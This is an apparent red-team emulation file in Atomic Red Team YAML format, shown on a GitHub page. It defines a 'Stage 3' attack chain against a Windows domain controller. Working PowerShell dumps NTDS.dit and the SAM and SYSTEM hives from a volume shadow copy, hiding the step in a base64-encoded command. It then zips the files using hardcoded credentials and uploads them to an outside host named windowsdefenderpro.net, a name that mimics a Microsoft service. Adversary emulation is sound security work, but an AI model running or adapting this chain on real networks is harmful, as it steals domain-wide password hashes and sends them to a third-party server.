-
Notifications
You must be signed in to change notification settings - Fork 0
/
Stage3.yaml
87 lines (82 loc) · 3.74 KB
/
Stage3.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
# Run as discovered domain admin user
attack_technique: Stage3
display_name: "Privilege Escalation and Credential Dumping"
atomic_tests:
# T1003.003 NTDS
- name: Copy NTDS.dit from Volume Shadow Copy
auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03
description: |
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
supported_platforms:
- windows
executor:
command: |
nltest /dclist:$domain | % {
if($_ -match '\\\\([^'']+)'){
$dc = $matches[1]
}
}
invoke-command -ComputerName "$dc.lab.lan" -UseSSL -Authentication Negotiate -SessionOption (New-PSSessionOption -SkipRevocationCheck) -ErrorAction SilentlyContinue {
$ps1 = @'
$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
cmd /c copy "$($volume.DeviceObject)\Windows\NTDS\NTDS.dit" C:\temp\ntds.dit
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\temp\dcsam.save
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\system" C:\temp\dcsystem.save
$volume.Delete();if($notrunning -eq 1){$service.Stop()}
'@
$bytes = [System.Text.Encoding]::Unicode.GetBytes($ps1)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell -enc $encodedCommand
}
copy-item \\$dc\c$\temp\ntds.dit c:\temp\
copy-item \\$dc\c$\temp\dcsam.save c:\temp\
copy-item \\$dc\c$\temp\dcsystem.save c:\temp\
name: powershell
# T1560 Archive Collected
- name: Compress Data for Tranport
auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
description: |
Compress data using powershell as newly created admin user
supported_platforms:
- windows
dependencies:
executor:
name: powershell
elevation_required: false
command: |
$Username = 'testuser1'
$Password = '#12345Abc'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
invoke-command -ComputerName $env:COMPUTERNAME -Credential $Cred -SessionOption (New-PSSessionOption -SkipRevocationCheck) -ScriptBlock {
$compress = @{
Path = "C:\Temp\ntds.dit","C:\temp\dc*.save"
CompressionLevel = "Fastest"
DestinationPath = "C:\Temp\${env:COMPUTERNAME}_dcexfil.zip"
}
Compress-Archive @compress -Force
}
# T1567 Exfiltration Over Web Service (to view results https://windowsdefenderpro.net/{reqid from c:\temp\dcreqid.txt})
- name: Exflitration Over Web Service
auto_generated_guid: d1334303-59cb-4a03-8213-b3e24d02c198
description: |
Post file using powershell
supported_platforms:
- windows
dependencies:
executor:
name: powershell
elevation_required: false
command: |
$uri = "https://windowsdefenderpro.net/upload/"
$base64Image = [convert]::ToBase64String(([System.IO.File]::ReadAllBytes("C:\Temp\${env:COMPUTERNAME}_dcexfil.zip")))
$result = (Invoke-WebRequest -uri $uri -Method Post -Body $base64Image -ContentType "application/base64" -UseBasicParsing).Content | convertfrom-json
$result.reqid | out-file -FilePath C:\temp\dcreqid.txt
# END STAGE 3